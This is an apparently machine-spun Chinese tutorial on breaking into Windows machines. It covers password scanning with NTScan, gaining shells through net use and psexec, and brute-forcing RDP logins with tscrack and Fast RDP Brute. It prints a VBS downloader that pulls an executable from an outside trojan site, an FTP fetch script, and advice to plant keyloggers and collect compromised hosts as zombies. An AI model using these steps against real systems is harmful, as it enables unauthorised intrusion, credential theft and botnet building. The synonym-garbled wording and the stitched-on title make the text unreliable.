phpadodb读取中文乱码暗码平安系列文章7Windows口令扫描及3389口令暴力破解

1.确定须要扫描的IP地址或者IP地址段

2.网络用户名和密码，常见的是Administrator为用户较多，但在内网中，很多用户都喜好利用个性化名字进行登录，因此须要网络一些用户名；密码字典的整理尤其主要，可以包含网站利用过的密码，社工库邮件地址或者用户名查询到的密码，公司名称，电话号码，出生日期，手机号码，QQ号码等。

3.编辑密码和口令配置文件

Windows口令扫描攻击紧张针对某一个IP地址或者某一个网段入口令扫描，本色是通过139、445等端口来考试测验建立连接，其利用的是Dos命令“net use \\ipaddress\admin$ “password” /u:user”，只不过通过程序来实现而已。
下面的案例通过扫描软件NTScan来扫描口令，扫描出口令后成功履行掌握的案例。

1.设置NTScan

直接运行NTscan，在NTscan中一样平常只须要设置开始IP和结束IP两个地方，其它设置均可以采纳默认，如图1所示。

图1 设置NTscan

&解释

①如果是在肉鸡上面风雅管理扫描，由于措辞版本的不同，如果操作系统不支持中文显示，就有可能显示为乱码，这个时候设置就只能凭熟习度来进行设置，在本例中是在英文操作系统中利用NTscan，在其运行界面中一些汉字显示为“？”，但是不影响扫描利用，如图2所示。

图2 NTscan乱码显示

②在NTscan中有IPC、SMB和WMI三种扫描办法，第一种和第三种办法扫描口令较为有效，第二种紧张用来扫描共享文件。
利用IPC$可以与目标主机建立一个空的连接而无需用户名与密码，而且还可以得到目标主机上的用户列表。
SMB（做事器信息块）协议是一种IBM协议，用于在打算机间共享文件、打印机、串口等。
SMB 协议可以用在因特网的TCP/IP协议之上，也可以用在其它网络协议如IPX和NetBEUI 之上。

③WMI（Windows管理规范）是一项核心的Windows管理技能，WMI作为一种规范和根本构造，通过它可以访问、配置、管理和监视险些所有的Windows资源，比如用户可以在远程打算机器上启动一个进程；设定一个在特定日期和韶光运行的进程；远程启动打算机；得到本地或远程打算机的已安装程序列表；查询本地或远程打算机的Windows事宜日志等等。
一样平常情形下，在本地打算机上实行的WMI操作也可以在远程打算机上实行，只要用户拥有该打算机的管理员权限。
如果用户对远程打算机拥有权限并且远程打算机支持远程访问，那么用户就可以连接到该远程打算机并实行拥有相应权限的操作。

2.实行扫描

在NTscan运行界面中单击“开始”按钮或者单击左窗口下面的第一按钮（如果显示为乱码），开始扫描，如图3所示。

图3 扫描口令

&解释

①NTscan扫描口令跟字典有关，其事理便是利用字典中的口令跟实际口令进行比拟，如果相同即可建立连接，即破解成功，破解成功后会不才方显示。

②NTscan的字典文件为NT_pass.dic，用户文件为NT_user.dic，可以根据实际情形对字典文件和用户文件内容进行修正。

③NTscan扫描结束后，会在NTscan程序当前目录下天生一个NTscan.txt文件，该文件记录扫描结果，如图4所示。

图4 NTscan扫描记录文件

④在NTscan中还有一些赞助功能，例如右键单击后可以实行“cmd”命令，左键单击后可以实行“连接”、“打开远程上岸”以及“映射网络驱动器”等命令，如图5所示。

图5NTscan赞助功能

3.履行掌握

在Dos命令提示符下输入“net use \\221...\admin$ "mrs6100" /u:administrator”命令获取主机的管理员权限。
命令实行成功，如图6所示。

4.实行Psexec命令

输入“psexec \\221... cmd”命令获取一个DosShell，如图7所示。

图7获取DosShell

&解释

①以上两步可以合并，直接在Dos命令提示符下输入“psexec \\ipaddress –u administrator －ppassword cmd”。
例如在上例中可以输入“psexec \\221... -u Administrator –pmrs6100 cmd”命令来获取一个Dos下的Shell。

②在有些情形下利用“psexec \\ipaddress –u administrator －ppassword cmd”命令不能正常实行。

5.从远端查看被入侵打算机端口开放情形

利用“sfind –p 221...”命令查看远程主机端口开放情形，该主机仅仅开放了4899端口，如图8所示。

图8查看端口开放情形

6.上传文件

在该DosShell下实行文件下载命令，将一些工具软件或者木马软件上传的被攻击打算机上面，如图9所示。

图9 上传文件

&解释

①可以利用以下vbs脚本命令来上传文件。

echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe

echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe

echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe

echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe

cscript dl.vbe http://www.mymuma.com/software/systeminfo.exe systeminfo.exe

②如果不能通过实行vbs脚本来上传文件，则可以通过实行ftp命令来上传文件，ftp命令如下：

echo open 192.168.1.1 >b

echo ftp>>b

echo ftp>>b

echo bin>>b

echo get systeminfo.exe >>b

echo bye >>b

ftp -s:b

7.并查看主机基本信息

实行“systeminfo info”可以查看被入侵打算机的基本信息，该打算机操作系统为Windows 2000 Professional，如图10所示

图10 查看主机基本信息

8.进行渗透

在本案例中，由于对方打算机安装有Radmin，因此极有可能保留有Radmin的掌握信息，通过“开始”-“程序”-“Remote Administrator v2.2”-“Remote Administrator viewer”打开Radmin2.0版本的客户端掌握器，在个中有两个IP地址，如图11所示，不过不知道连接密码，安装一个键盘记录，等待用户自己连接，监听用户的键盘记录，到时候就可以将用户的掌握端作为肉鸡，这种肉鸡质量很高。

图11 获取Radmin掌握端信息

9.小结

本案例通过NTscan扫描工具软件扫描主机口令，合营psexec等命令成功掌握掌握扫描出弱口令的打算机，其实在本案例中，该口令并不算弱口令，将被掌握打算机的口令作为扫描口令，有时候会掌握一大片打算机作为好肉鸡。

3389终端攻击紧张通过3389破解上岸器（tscrack）来实现的，tscrack是微软开拓远程终端做事（3389）的测试产品，后面有人将其做了一些修正，可以用来破解3389口令；其核心事理便是利用字典合营远程终端上岸器进行考试测验上岸，一旦上岸成功则认为破解成功。
破解成功紧张取决于字典强度和韶光长度，在成功进入内网后，借助该方法可以对内网3389做事器进行渗透，该方法对Windows 2000 Server攻击效果较佳。

1.安装Tscrack软件

tscrack初次运行时须要进行安装，即直接运行tscrack.exe程序即可，如果不能正常运行则须要运行“tscrack -U”命令卸载tscrack中的组件往后再次运行tscrack.exe即可。
运行成功后，会提示安装组件、解压缩组件、注册组件成功，如图12所示。

图12 安装tscrack程序

2.探求开放3389的IP地址

在Dos提示符下输入“sfind –p 220...”，探测其端口开放情形，如图13所示。

图13 探测3389端口

3. 构建字典文件

构建字典文件100words.txt，在100words.txt文件中加入破解口令，每一个口令占用独立的一行，且行尾无空格，编辑完成后，如图14所示。

图14构建字典文件

4.编辑破解命令

如果仅仅是对单个IP地址进行破解，其破解命令格式为“tscrack ip –w 100words.txt”，如果是对多个ip地址进行破解，则可以将ip地址整理成一个文件，每一个ip地址占一行，且行尾无空格，将其保存为ip.txt，然后可以编辑一个批命令，如图15所示。

图15 编辑破解命令

&解释

（1）在原程序tscrack.exe可以变动为任意名称，100words.txt也可以是任意名称。

（2）如果是对多个IP地址进行破解，则字典文件不能太大，否则破解韶光会很长，建议是针对单一的IP地址进行破解。

5.破解3389口令

运行批命令后，远程终端破解程序开始破解，tscrack会利用字典的口令一个一个的进行考试测验上岸，只是程序自动输入密码，如图16所示，在程序破解过程中不要进行手动干涉，让程序自动进行破解。

图16破解口令

6.破解成功

当破解成功后，程序会自动结束，显示破解的口令和破解该口令所花费的韶光，如图17所示。

图17 破解口令成功

&解释

（1）Tscrack破解3389终端口令后不会天生log文件，破解的口令显示在Dos窗口，一旦Dos窗口关闭，所有结果都不会保存。

（2）如果是对多个IP地址进行3389终端口令破解，Tscrack程序会将所有IP地址都进行破解考试测验后才会停滞。

（3）Tscrack破解3389终端口令相对应的用户只能是Administrator，对其它用户无能为力。

7.利用口令和用户上岸

运行mstsc.exe打开终端连接器，输入IP地址进行连接，在3389连接界面中输入刚才破解的密码和Administrator用户，连接成功，如图18所示。

图18进入远程终端桌面

8.小结

本案例通过tscrack程序来破解远程终端（3389）的口令，只要字典足够强大以及时间足够，如果对方未采纳IP地址上岸限定等安全方法，则其口令在理论上是可以破解的，不过在微软升级补丁后该方法仅对Window 2000 Server效果较好，对Windows 2003以及以上版本效果不佳。
应对3389远程终端口令破解的安全方法是进行IP地址信赖连接，或者通过一些软件来限定只有某一些IP地址才能访问远程终端。

1.软件简介

Fast RDP Brute 是俄罗斯Roleg开拓的一款暴力破解工具，紧张用于扫描远程桌面连接弱口令的工具。
官方网站下载地址http://stascorp.com/load/1-1-0-58，运行软件后界面如图19所示。

图19程序主界面

2. 设置紧张参数

（1）Max threads:设置扫描线程数，默认为1000，一样平常不用修正。

（2）Scan timeout:设置超时时间，默认为2000，一样平常不用修正。

（3）Thread timeout:设置线程超时时间，默认为60000，一样平常不用修正。

（4）Scan ports:设置要扫描的端口，根据实际情形设置，默认为3389，3390和3391，在实际扫描过程中如果是对某一个已知IP和端口进行扫描，建议删除多于端口，例如对方端口为3388，则只保留3388即可。

（5）Ip ranges to scan: 设置扫描的ip范围

（6）用户名和密码可以在文件夹下的user.txt和pass.txt文件内自行设置。
如图20所示，在默认的user.txt中包含俄文的管理员，一样平常用不上，可以根据实际情形进行设置。

图20设置暴力破解的用户名和密码字典

3.局域网扫描测试

本次测试采取Vmware，搭建了两个平台，扫描主机IP地址为“192.168.148.128”；被扫描主机IP为“192.168.148.132”，操作系统为Win2003，开放3389端口，在该做事器上新建立test、antian365用户，并将设置的密码复制到扫描字典中，单击“start scan”进行扫描，扫描结果如图21所示。

把稳：

（1）在192.168.148.132做事器上必须开启3389。

（2）在扫描做事器上实行mstsc命令，输入IP地址192.168.148.132进行3389登录测试，看看能否访问网络，如果无法访问网络，则扫描就无效。

图21扫描成果

4.总结与思考

（1）该软件虽然供应多个用户同时扫描，但只要扫描出一个结果后，软件就停滞扫描。
对付多用户扫描，可以在扫描出结果后，将已经扫描出来的用户删除后连续进行扫描，或者针对单用户进行扫描

（2）扫描韶光或者连接次数较多时，会显示too many errors缺点。
如图22所示

图22扫描缺点

（3）该软件可以对单个用户进行已知密码扫描，在已经获取内网权限下，可以对全体网络开放3389的主机进行扫描，获取权限。

（4）在网上对其余一个软件“DUBrute V4.2 RC”也进行3389密码暴力破解测试，测试环境同上，实际测试效果无法破解。